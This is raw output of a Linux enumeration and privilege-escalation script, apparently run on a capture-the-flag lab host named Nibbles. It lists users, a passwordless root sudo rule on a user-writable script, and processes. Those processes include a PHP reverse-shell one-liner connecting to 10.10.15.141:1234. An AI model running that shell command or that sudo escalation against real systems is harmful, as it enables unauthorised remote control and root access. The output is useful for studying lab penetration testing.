
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# 

[-] Debug Info
[+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)


Scan started at:
Tue Jun 26 18:29:25 EDT 2018


### SYSTEM ##############################################
[-] Kernel information:
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.4.0-104-generic (buildd@lgw01-amd64-022) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.5) ) #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS"
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


[-] Hostname:
Nibbles


### USER/GROUP ##########################################
[-] Current user/group info:
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             tty1                      Fri Dec 29 05:21:10 -0500 2017


[-] Who else is logged on:
 18:29:25 up 17 min,  0 users,  load average: 0.01, 0.03, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=108(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=111(mysql) gid=118(mysql) groups=118(mysql)
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)


[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
nibbler:x:1001:1001::/home/nibbler:


[-] Super user account(s):
root


[+] We can sudo without supplying a password!
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh


[+] Possible sudo pwnage!
-rwxr-xr-x 1 nibbler nibbler 24 Jun 26 18:28 /home/nibbler/personal/stuff/monitor.sh


[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root    root    4.0K Dec 10  2017 .
drwxr-xr-x 23 root    root    4.0K Dec 28 05:57 ..
drwxr-xr-x  4 nibbler nibbler 4.0K Jun 26 18:14 nibbler


[-] Root is allowed to login via SSH:
PermitRootLogin yes


### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=nibbler
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/tmp
APACHE_RUN_GROUP=nibbler
LANG=C
SHLVL=1
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env


[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin


[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen


[-] Current umask value:
0022
u=rwx,g=rx,o=rx


[-] umask value as specified in /etc/login.defs:
UMASK		022


[-] Password and storage information:
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  722 Apr  5  2016 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x  2 root root 4096 Dec 28 05:57 .
drwxr-xr-x 92 root root 4096 Dec 28 05:58 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rw-r--r--  1 root root  589 Jul 16  2014 mdadm
-rw-r--r--  1 root root  712 Sep  5  2017 php
-rw-r--r--  1 root root  191 Sep 22  2017 popularity-contest

/etc/cron.daily:
total 60
drwxr-xr-x  2 root root 4096 Dec 28 05:57 .
drwxr-xr-x 92 root root 4096 Dec 28 05:58 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root  539 Apr  5  2016 apache2
-rwxr-xr-x  1 root root  376 Mar 31  2016 apport
-rwxr-xr-x  1 root root 1474 Jun 19  2017 apt-compat
-rwxr-xr-x  1 root root  355 May 22  2012 bsdmainutils
-rwxr-xr-x  1 root root 1597 Nov 26  2015 dpkg
-rwxr-xr-x  1 root root  372 May  6  2015 logrotate
-rwxr-xr-x  1 root root 1293 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  539 Jul 16  2014 mdadm
-rwxr-xr-x  1 root root  435 Nov 18  2014 mlocate
-rwxr-xr-x  1 root root  249 Nov 12  2015 passwd
-rwxr-xr-x  1 root root 3449 Feb 26  2016 popularity-contest
-rwxr-xr-x  1 root root  214 May 24  2016 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Sep 22  2017 .
drwxr-xr-x 92 root root 4096 Dec 28 05:58 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Sep 22  2017 .
drwxr-xr-x 92 root root 4096 Dec 28 05:58 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.weekly:
total 24
drwxr-xr-x  2 root root 4096 Sep 22  2017 .
drwxr-xr-x 92 root root 4096 Dec 28 05:58 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root   86 Apr 13  2016 fstrim
-rwxr-xr-x  1 root root  771 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  211 May 24  2016 update-notifier-common


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


### NETWORKING  ##########################################
[-] Network and IP info:
ens32     Link encap:Ethernet  HWaddr 00:50:56:b9:72:30  
          inet addr:10.10.10.75  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:7230/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:7230/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:65601 errors:0 dropped:0 overruns:0 frame:0
          TX packets:9879 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:5115266 (5.1 MB)  TX bytes:2708694 (2.7 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:176 errors:0 dropped:0 overruns:0 frame:0
          TX packets:176 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:13424 (13.4 KB)  TX bytes:13424 (13.4 KB)


[-] ARP history:
? (10.10.10.2) at 00:50:56:aa:9c:8d [ether] on ens32


[-] Nameserver(s):
nameserver 10.10.10.2


[-] Default route:
default         10.10.10.2      0.0.0.0         UG    0      0        0 ens32


[-] Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0    112 10.10.10.75:38418       10.10.15.141:1234       ESTABLISHED 2112/php        
tcp        0      0 10.10.10.75:51852       10.10.15.34:4444        ESTABLISHED 1447/sh         
tcp        0      0 10.10.10.75:49102       10.10.15.141:4444       ESTABLISHED 2111/sh         
tcp        0      0 10.10.10.75:49574       10.10.14.251:4444       ESTABLISHED 2137/sh         
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0    391 10.10.10.75:80          10.10.14.160:55972      ESTABLISHED -               
tcp6       0      0 10.10.10.75:80          10.10.14.160:55970      TIME_WAIT   -               
tcp6       1      0 10.10.10.75:80          10.10.15.141:41153      CLOSE_WAIT  -               
tcp6       0      0 10.10.10.75:80          10.10.15.231:55100      SYN_RECV    -               
tcp6       0      0 10.10.10.75:80          10.10.15.231:54971      FIN_WAIT2   -               
tcp6       1      0 10.10.10.75:80          10.10.14.251:37103      CLOSE_WAIT  -               
tcp6       0      0 10.10.10.75:80          10.10.15.231:55099      SYN_RECV    -               
tcp6       0      0 10.10.10.75:80          10.10.15.231:55098      SYN_RECV    -               
tcp6       1      0 10.10.10.75:80          10.10.15.34:39329       CLOSE_WAIT  -               
tcp6       0      0 10.10.10.75:80          10.10.14.160:55968      TIME_WAIT   -               
tcp6       0      0 10.10.10.75:80          10.10.15.231:55097      ESTABLISHED -               


[-] Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 10.10.10.75:58926       10.10.10.2:53           ESTABLISHED -               


### SERVICES #############################################
[-] Running processes:
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root          1  0.2  0.5 119904  5860 ?        Ss   18:12   0:03 /sbin/init
root          2  0.0  0.0      0     0 ?        S    18:12   0:00 [kthreadd]
root          3  0.0  0.0      0     0 ?        S    18:12   0:00 [ksoftirqd/0]
root          5  0.0  0.0      0     0 ?        S<   18:12   0:00 [kworker/0:0H]
root          7  0.1  0.0      0     0 ?        S    18:12   0:01 [rcu_sched]
root          8  0.0  0.0      0     0 ?        S    18:12   0:00 [rcu_bh]
root          9  0.0  0.0      0     0 ?        S    18:12   0:00 [migration/0]
root         10  0.0  0.0      0     0 ?        S    18:12   0:00 [watchdog/0]
root         11  0.0  0.0      0     0 ?        S    18:12   0:00 [kdevtmpfs]
root         12  0.0  0.0      0     0 ?        S<   18:12   0:00 [netns]
root         13  0.0  0.0      0     0 ?        S<   18:12   0:00 [perf]
root         14  0.0  0.0      0     0 ?        S    18:12   0:00 [khungtaskd]
root         15  0.0  0.0      0     0 ?        S<   18:12   0:00 [writeback]
root         16  0.0  0.0      0     0 ?        SN   18:12   0:00 [ksmd]
root         17  0.0  0.0      0     0 ?        SN   18:12   0:00 [khugepaged]
root         18  0.0  0.0      0     0 ?        S<   18:12   0:00 [crypto]
root         19  0.0  0.0      0     0 ?        S<   18:12   0:00 [kintegrityd]
root         20  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root         21  0.0  0.0      0     0 ?        S<   18:12   0:00 [kblockd]
root         22  0.0  0.0      0     0 ?        S<   18:12   0:00 [ata_sff]
root         23  0.0  0.0      0     0 ?        S<   18:12   0:00 [md]
root         24  0.0  0.0      0     0 ?        S<   18:12   0:00 [devfreq_wq]
root         28  0.0  0.0      0     0 ?        S    18:12   0:00 [kswapd0]
root         29  0.0  0.0      0     0 ?        S<   18:12   0:00 [vmstat]
root         30  0.0  0.0      0     0 ?        S    18:12   0:00 [fsnotify_mark]
root         31  0.0  0.0      0     0 ?        S    18:12   0:00 [ecryptfs-kthrea]
root         47  0.0  0.0      0     0 ?        S<   18:12   0:00 [kthrotld]
root         48  0.0  0.0      0     0 ?        S<   18:12   0:00 [acpi_thermal_pm]
root         49  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root         50  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root         51  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root         52  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root         53  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root         54  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root         55  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root         56  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root         57  0.0  0.0      0     0 ?        S    18:12   0:00 [scsi_eh_0]
root         58  0.0  0.0      0     0 ?        S<   18:12   0:00 [scsi_tmf_0]
root         59  0.0  0.0      0     0 ?        S    18:12   0:00 [scsi_eh_1]
root         60  0.0  0.0      0     0 ?        S<   18:12   0:00 [scsi_tmf_1]
root         61  0.0  0.0      0     0 ?        S    18:12   0:00 [kworker/u256:2]
root         66  0.0  0.0      0     0 ?        S<   18:12   0:00 [ipv6_addrconf]
root         79  0.0  0.0      0     0 ?        S<   18:12   0:00 [deferwq]
root         80  0.0  0.0      0     0 ?        S<   18:12   0:00 [charger_manager]
root         81  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root        150  0.0  0.0      0     0 ?        S    18:12   0:00 [scsi_eh_2]
root        151  0.0  0.0      0     0 ?        S<   18:12   0:00 [scsi_tmf_2]
root        153  0.0  0.0      0     0 ?        S<   18:12   0:00 [vmw_pvscsi_wq_2]
root        154  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root        168  0.0  0.0      0     0 ?        S<   18:12   0:00 [kworker/0:1H]
root        171  0.0  0.0      0     0 ?        S<   18:12   0:00 [kpsmoused]
root        180  0.0  0.0      0     0 ?        S<   18:12   0:00 [ttm_swap]
root        272  0.0  0.0      0     0 ?        S<   18:12   0:00 [raid5wq]
root        297  0.0  0.0      0     0 ?        S<   18:12   0:00 [kdmflush]
root        298  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root        308  0.0  0.0      0     0 ?        S<   18:12   0:00 [kdmflush]
root        309  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root        326  0.0  0.0      0     0 ?        S<   18:12   0:00 [bioset]
root        354  0.0  0.0      0     0 ?        S    18:12   0:00 [jbd2/dm-0-8]
root        355  0.0  0.0      0     0 ?        S<   18:12   0:00 [ext4-rsv-conver]
root        399  0.0  0.0      0     0 ?        S    18:12   0:00 [kworker/0:2]
root        417  0.0  0.2  28336  2920 ?        Ss   18:12   0:00 /lib/systemd/systemd-journald
root        430  0.0  0.0      0     0 ?        S<   18:12   0:00 [iscsi_eh]
root        431  0.0  0.0      0     0 ?        S    18:12   0:00 [kauditd]
root        444  0.0  0.0      0     0 ?        S<   18:12   0:00 [ib_addr]
root        448  0.0  0.1 102972  1636 ?        Ss   18:12   0:00 /sbin/lvmetad -f
root        449  0.0  0.0      0     0 ?        S<   18:12   0:00 [ib_mcast]
root        455  0.0  0.0      0     0 ?        S<   18:12   0:00 [ib_nl_sa_wq]
root        459  0.0  0.0      0     0 ?        S<   18:12   0:00 [ib_cm]
root        463  0.0  0.0      0     0 ?        S<   18:12   0:00 [iw_cm_wq]
root        468  0.0  0.0      0     0 ?        S<   18:12   0:00 [rdma_cm]
root        469  0.0  0.3  44368  3880 ?        Ss   18:12   0:00 /lib/systemd/systemd-udevd
root        730  0.0  0.0      0     0 ?        S<   18:12   0:00 [ext4-rsv-conver]
systemd+    767  0.0  0.2 100324  2492 ?        Ssl  18:12   0:00 /lib/systemd/systemd-timesyncd
root        778  0.0  0.0      0     0 ?        S    18:12   0:00 [kworker/0:4]
root        904  0.0  0.2  29012  2944 ?        Ss   18:12   0:00 /usr/sbin/cron -f
message+    907  0.0  0.3  42904  3788 ?        Ss   18:12   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
syslog      920  0.0  0.3 260632  3448 ?        Ssl  18:12   0:00 /usr/sbin/rsyslogd -n
daemon      921  0.0  0.2  26048  2208 ?        Ss   18:12   0:00 /usr/sbin/atd -f
root        931  0.1  0.3 613416  3928 ?        Ssl  18:12   0:01 /usr/bin/lxcfs /var/lib/lxcfs/
root        934  0.0  0.1  20104  1132 ?        Ss   18:12   0:00 /lib/systemd/systemd-logind
root        944  0.0  0.1   4400  1272 ?        Ss   18:12   0:00 /usr/sbin/acpid
root        945  0.0  0.6 275860  6196 ?        Ssl  18:12   0:00 /usr/lib/accountsservice/accounts-daemon
root        949  0.0  0.9 185612  9848 ?        Ssl  18:12   0:00 /usr/bin/vmtoolsd
root        953  0.0  2.2 268684 22140 ?        Ssl  18:12   0:00 /usr/lib/snapd/snapd
root       1001  0.0  0.5 277092  5924 ?        Ssl  18:12   0:00 /usr/lib/policykit-1/polkitd --no-debug
root       1008  0.0  0.0  13376   168 ?        Ss   18:12   0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root       1126  0.0  0.6  65524  6340 ?        Ss   18:12   0:00 /usr/sbin/sshd -D
root       1150  0.0  0.0   5224   156 ?        Ss   18:12   0:00 /sbin/iscsid
root       1151  0.0  0.3   5724  3512 ?        S<Ls 18:12   0:00 /sbin/iscsid
mysql      1155  0.0 15.3 1115980 153352 ?      Ssl  18:12   0:00 /usr/sbin/mysqld
root       1244  0.0  0.1  15940  1776 tty1     Ss+  18:12   0:00 /sbin/agetty --noclear tty1 linux
root       1341  0.0  2.4 328296 24736 ?        Ss   18:12   0:00 /usr/sbin/apache2 -k start
nibbler    1372  0.1  1.8 332472 18512 ?        R    18:13   0:01 /usr/sbin/apache2 -k start
nibbler    1373  0.1  1.7 332732 17592 ?        S    18:13   0:01 /usr/sbin/apache2 -k start
nibbler    1374  0.1  1.7 331940 17752 ?        S    18:13   0:01 /usr/sbin/apache2 -k start
nibbler    1375  0.1  1.8 332976 18944 ?        S    18:13   0:01 /usr/sbin/apache2 -k start
nibbler    1384  0.1  2.0 332720 20172 ?        S    18:13   0:01 /usr/sbin/apache2 -k start
nibbler    1390  0.0  1.8 332724 18072 ?        S    18:13   0:00 /usr/sbin/apache2 -k start
nibbler    1391  0.1  1.8 331944 18340 ?        S    18:13   0:01 /usr/sbin/apache2 -k start
nibbler    1394  0.1  1.8 332720 18176 ?        S    18:13   0:01 /usr/sbin/apache2 -k start
nibbler    1395  0.0  1.5 329572 15304 ?        S    18:13   0:00 /usr/sbin/apache2 -k start
nibbler    1396  0.2  1.9 332464 18984 ?        S    18:13   0:02 /usr/sbin/apache2 -k start
nibbler    1397  0.0  1.8 332716 18884 ?        S    18:13   0:00 /usr/sbin/apache2 -k start
nibbler    1429  0.0  0.0      0     0 ?        Z    18:14   0:00 [sh] <defunct>
nibbler    1447  0.0  0.0   4508   756 ?        S    18:14   0:00 sh -c /bin/sh 
nibbler    1448  0.0  0.0   4508   800 ?        S    18:14   0:00 /bin/sh
root       1590  0.0  0.0      0     0 ?        S    18:17   0:00 [kworker/u256:0]
nibbler    1592  0.0  0.0      0     0 ?        Z    18:18   0:00 [sh] <defunct>
nibbler    2031  0.0  0.0      0     0 ?        Z    18:21   0:00 [sh] <defunct>
nibbler    2050  0.0  0.3  18220  3252 ?        S    18:23   0:00 /bin/bash -i
nibbler    2057  0.0  0.0      0     0 ?        Z    18:24   0:00 [sh] <defunct>
nibbler    2100  0.0  0.0      0     0 ?        Z    18:27   0:00 [sh] <defunct>
root       2106  0.0  0.0      0     0 ?        S    18:27   0:00 [kworker/0:0]
nibbler    2111  0.0  0.0   4508   784 ?        S    18:27   0:00 sh -c php -r '$sock=fsockopen("10.10.15.141",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
nibbler    2112  0.0  1.8 202692 18080 ?        S    18:27   0:00 php -r $sock=fsockopen("10.10.15.141",1234);exec("/bin/sh -i <&3 >&3 2>&3");
nibbler    2113  0.0  0.0   4508   796 ?        S    18:27   0:00 sh -c /bin/sh -i <&3 >&3 2>&3
nibbler    2114  0.0  0.1   4508  1640 ?        S    18:27   0:00 /bin/sh -i
nibbler    2118  0.0  0.0      0     0 ?        Z    18:28   0:00 [sh] <defunct>
nibbler    2124  0.3  1.7 331880 17024 ?        S    18:28   0:00 /usr/sbin/apache2 -k start
nibbler    2125  0.0  1.5 328912 15076 ?        S    18:28   0:00 /usr/sbin/apache2 -k start
nibbler    2126  0.0  1.6 331940 16568 ?        S    18:28   0:00 /usr/sbin/apache2 -k start
nibbler    2133  0.0  0.3  18992  3908 ?        S    18:29   0:00 bash ./linenum.sh
nibbler    2134  0.0  0.3  19044  3436 ?        S    18:29   0:00 bash ./linenum.sh
nibbler    2135  0.0  0.0   4384   672 ?        S    18:29   0:00 tee -a
nibbler    2137  0.0  0.0   4508   708 ?        S    18:29   0:00 sh -c /bin/sh 
nibbler    2138  0.0  0.0   4508   748 ?        S    18:29   0:00 /bin/sh
nibbler    2317  0.0  0.2  19028  2800 ?        S    18:30   0:00 bash ./linenum.sh
nibbler    2318  0.0  0.2  34428  2860 ?        R    18:30   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root  1037528 May 16  2017 /bin/bash
lrwxrwxrwx 1 root root        4 Sep 22  2017 /bin/sh -> dash
-rwxr-xr-x 1 root root   326224 Oct 27  2017 /lib/systemd/systemd-journald
-rwxr-xr-x 1 root root   618520 Oct 27  2017 /lib/systemd/systemd-logind
-rwxr-xr-x 1 root root   141904 Oct 27  2017 /lib/systemd/systemd-timesyncd
-rwxr-xr-x 1 root root   453240 Oct 27  2017 /lib/systemd/systemd-udevd
-rwxr-xr-x 1 root root    44104 Jun 14  2017 /sbin/agetty
lrwxrwxrwx 1 root root       20 Oct 27  2017 /sbin/init -> /lib/systemd/systemd
-rwxr-xr-x 1 root root   783984 Jul 26  2017 /sbin/iscsid
-rwxr-xr-x 1 root root    51336 Apr 16  2016 /sbin/lvmetad
-rwxr-xr-x 1 root root   513216 Nov  8  2017 /sbin/mdadm
-rwxr-xr-x 1 root root   224208 Jan 12  2017 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root    18504 Nov  8  2017 /usr/bin/lxcfs
-rwxr-xr-x 1 root root    44528 Feb  9  2017 /usr/bin/vmtoolsd
-rwxr-xr-x 1 root root   164928 Nov  3  2016 /usr/lib/accountsservice/accounts-daemon
-rwxr-xr-x 1 root root    15048 Jan 17  2016 /usr/lib/policykit-1/polkitd
-rwxr-xr-x 1 root root 21178072 Nov 30  2017 /usr/lib/snapd/snapd
-rwxr-xr-x 1 root root    48112 Apr  8  2016 /usr/sbin/acpid
-rwxr-xr-x 1 root root   662496 Sep 18  2017 /usr/sbin/apache2
-rwxr-xr-x 1 root root    26632 Jan 14  2016 /usr/sbin/atd
-rwxr-xr-x 1 root root    44472 Apr  5  2016 /usr/sbin/cron
-rwxr-xr-x 1 root root 24803912 Oct 18  2017 /usr/sbin/mysqld
-rwxr-xr-x 1 root root   599328 Apr  5  2016 /usr/sbin/rsyslogd
-rwxr-xr-x 1 root root   799216 Mar 16  2017 /usr/sbin/sshd


[-] /etc/init.d/ binary permissions:
total 324
drwxr-xr-x  2 root root 4096 Dec 28 05:57 .
drwxr-xr-x 92 root root 4096 Dec 28 05:58 ..
-rw-r--r--  1 root root 1183 Dec 28 05:57 .depend.boot
-rw-r--r--  1 root root 1065 Dec 28 05:57 .depend.start
-rw-r--r--  1 root root 1209 Dec 28 05:57 .depend.stop
-rw-r--r--  1 root root 2427 Jan 19  2016 README
-rwxr-xr-x  1 root root 2243 Feb  9  2016 acpid
-rwxr-xr-x  1 root root 2210 Apr  5  2016 apache-htcacheclean
-rwxr-xr-x  1 root root 8087 Apr  5  2016 apache2
-rwxr-xr-x  1 root root 6223 Mar  3  2017 apparmor
-rwxr-xr-x  1 root root 2802 Nov 17  2017 apport
-rwxr-xr-x  1 root root 1071 Dec  6  2015 atd
-rwxr-xr-x  1 root root 1275 Jan 19  2016 bootmisc.sh
-rwxr-xr-x  1 root root 3807 Jan 19  2016 checkfs.sh
-rwxr-xr-x  1 root root 1098 Jan 19  2016 checkroot-bootclean.sh
-rwxr-xr-x  1 root root 9353 Jan 19  2016 checkroot.sh
-rwxr-xr-x  1 root root 1343 Apr  4  2016 console-setup
-rwxr-xr-x  1 root root 3049 Apr  5  2016 cron
-rwxr-xr-x  1 root root  937 Mar 28  2015 cryptdisks
-rwxr-xr-x  1 root root  896 Mar 28  2015 cryptdisks-early
-rwxr-xr-x  1 root root 2813 Dec  1  2015 dbus
-rwxr-xr-x  1 root root 1105 Mar 15  2016 grub-common
-rwxr-xr-x  1 root root 1336 Jan 19  2016 halt
-rwxr-xr-x  1 root root 1423 Jan 19  2016 hostname.sh
-rwxr-xr-x  1 root root 3809 Mar 12  2016 hwclock.sh
-rwxr-xr-x  1 root root 2372 Apr 11  2016 irqbalance
-rwxr-xr-x  1 root root 1503 Mar 29  2016 iscsid
-rwxr-xr-x  1 root root 1804 Apr  4  2016 keyboard-setup.dpkg-bak
-rwxr-xr-x  1 root root 1300 Jan 19  2016 killprocs
-rwxr-xr-x  1 root root 2087 Dec 20  2015 kmod
-rwxr-xr-x  1 root root  695 Oct 30  2015 lvm2
-rwxr-xr-x  1 root root  571 Oct 30  2015 lvm2-lvmetad
-rwxr-xr-x  1 root root  586 Oct 30  2015 lvm2-lvmpolld
-rwxr-xr-x  1 root root 2378 Nov  8  2017 lxcfs
-rwxr-xr-x  1 root root 2541 Jun 30  2016 lxd
-rwxr-xr-x  1 root root 2365 Oct  9  2017 mdadm
-rwxr-xr-x  1 root root 1199 Jul 16  2014 mdadm-waitidle
-rwxr-xr-x  1 root root  703 Jan 19  2016 mountall-bootclean.sh
-rwxr-xr-x  1 root root 2301 Jan 19  2016 mountall.sh
-rwxr-xr-x  1 root root 1461 Jan 19  2016 mountdevsubfs.sh
